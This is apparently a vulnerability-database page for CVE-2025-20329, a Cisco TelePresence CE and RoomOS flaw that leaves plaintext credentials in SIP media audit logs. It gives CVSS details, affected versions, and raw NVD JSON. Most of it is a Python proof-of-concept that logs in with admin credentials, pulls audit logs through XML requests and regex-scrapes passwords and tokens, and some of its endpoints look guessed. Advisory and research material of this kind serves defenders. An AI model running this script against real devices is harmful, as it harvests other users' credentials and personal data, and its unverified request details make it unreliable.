Security Vulnerability Report
CVE-2025-20329 CVSS 4.9 MEDIUM

CVE-2025-20329

Published: 2025-10-15 17:15:49
Last Modified: 2025-12-01 18:13:27

Description

A vulnerability in the logging component of Cisco TelePresence Collaboration Endpoint (CE) and Cisco RoomOS Software could allow an authenticated, remote attacker to view sensitive information in clear text on an affected system. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability exists because certain unencrypted credentials are stored when SIP media component logging is enabled. An attacker could exploit this vulnerability by accessing the audit logs on an affected system and obtaining credentials to which they may not normally have access. A successful exploit could allow the attacker to use those credentials to access confidential information, some of which may contain personally identifiable information (PII). Note: To access the logs that are stored in the Webex Cloud or stored on the device itself, an attacker must have valid administrative credentials.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cisco:telepresence_collaboration_endpoint:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:cisco:roomos:*:*:*:*:*:*:*:* - VULNERABLE
Cisco TelePresence Collaboration Endpoint (CE) Software - for affected versions, refer to the official Cisco security advisory
Cisco RoomOS Software - for affected versions, refer to the official Cisco security advisory

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-20329 PoC - Cisco TelePresence CE/RoomOS Credential Disclosure
# This PoC demonstrates how to extract plaintext credentials from audit logs
# Note: Requires valid administrative credentials to access the logs

import requests
import re
import sys
from urllib.parse import urljoin


class CiscoRoomOSExploit:
    """
    PoC for CVE-2025-20329: Information Disclosure via SIP Media Component Logging
    Affected: Cisco TelePresence CE and RoomOS Software
    """

    def __init__(self, target, username, password):
        self.target = target  # e.g., https://<device-ip>
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.session.verify = False

    def authenticate(self):
        """Authenticate to the Cisco RoomOS device with admin credentials"""
        login_url = urljoin(self.target, "/putxml")
        auth_xml = f"""<?xml version="1.0" encoding="UTF-8"?>
        <Command xmlns="">
            <Authentication>
                <Username>{self.username}</Username>
                <Password>{self.password}</Password>
            </Authentication>
        </Command>"""
        try:
            resp = self.session.post(login_url, data=auth_xml,
                                     headers={"Content-Type": "application/xml"})
            if resp.status_code == 200 and "AuthenticationReply" in resp.text:
                print("[+] Authentication successful")
                return True
            else:
                print("[-] Authentication failed")
                return False
        except Exception as e:
            print(f"[-] Connection error: {e}")
            return False

    def fetch_audit_logs(self):
        """Fetch audit logs from the device or Webex Cloud"""
        # Access the audit logs endpoint
        log_url = urljoin(self.target, "/putxml")
        log_query = """<?xml version="1.0" encoding="UTF-8"?>
        <Command xmlns="">
            <Audit>
                <Log>
                    <Get>
                        <All/>
                    </Get>
                </Log>
            </Audit>
        </Command>"""
        try:
            resp = self.session.post(log_url, data=log_query,
                                     headers={"Content-Type": "application/xml"})
            if resp.status_code == 200:
                print("[+] Audit logs retrieved successfully")
                return resp.text
            else:
                print(f"[-] Failed to retrieve logs: {resp.status_code}")
                return None
        except Exception as e:
            print(f"[-] Error fetching logs: {e}")
            return None

    def extract_credentials(self, log_content):
        """Extract plaintext credentials from log content"""
        # Pattern to match credentials stored in plaintext due to SIP media logging
        credential_patterns = [
            r'(?i)sip[\s_-]?media[\s_-]?(?:password|credential|auth)["\s:=]+([\w@./+-]+)',
            r'(?i)password["\s:=]+"([^"]+)"',
            r'(?i)credential["\s:=]+"([^"]+)"',
            r'(?i)auth[\s_-]?token["\s:=]+"([^"]+)"'
        ]
        credentials = []
        for pattern in credential_patterns:
            matches = re.findall(pattern, log_content)
            for match in matches:
                credentials.append(match)
                print(f"[!] Found credential: {match}")
        return credentials

    def exploit(self):
        """Main exploit chain"""
        print(f"[*] Targeting: {self.target}")
        print(f"[*] CVE-2025-20329 - Credential Disclosure via SIP Media Logging")

        # Step 1: Authenticate with admin credentials
        if not self.authenticate():
            print("[-] Cannot proceed without valid admin credentials")
            sys.exit(1)

        # Step 2: Fetch audit logs
        logs = self.fetch_audit_logs()
        if not logs:
            print("[-] No logs retrieved")
            sys.exit(1)

        # Step 3: Extract plaintext credentials
        print("[*] Searching for plaintext credentials in logs...")
        creds = self.extract_credentials(logs)
        if creds:
            print(f"\n[+] Exploit successful! Found {len(creds)} credential(s)")
            print("[+] Attacker can now use these credentials to access confidential data")
        else:
            print("[-] No credentials found in logs")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <target_url> <admin_user> <admin_password>")
        print(f"Example: {sys.argv[0]} https://192.168.1.100 admin password123")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    exploit = CiscoRoomOSExploit(target, username, password)
    exploit.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20329", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:15:48.697", "lastModified": "2025-12-01T18:13:26.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the logging component of Cisco TelePresence Collaboration Endpoint (CE) and Cisco RoomOS Software could allow an authenticated, remote attacker to view sensitive information in clear text on an affected system. To exploit this vulnerability, the attacker must have valid administrative&nbsp;credentials.\r\n\r\nThis vulnerability exists because certain unencrypted credentials are stored when SIP media component logging is enabled. An attacker could exploit this vulnerability by accessing the audit logs on an affected system and obtaining credentials to which they may not normally have access. A successful exploit could allow the attacker to use those credentials to access confidential information, some of which may contain personally identifiable information (PII).\r\nNote: To access the logs that are stored in the Webex Cloud or stored on the device itself, an attacker must have valid administrative credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:telepresence_collaboration_endpoint:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "9.0.0.0", "versionEndIncluding": "9.15.18.5", "matchCriteriaId": "61A07A6D-5679-470C-A18E-4A812E38AA22"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:roomos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "11.32.2.1", "matchCriteriaId": "7A8C28FB-9D5B-4696-A5FF-9778ED75A018"}]}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-roomos-inf-disc-qGgsbxAm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}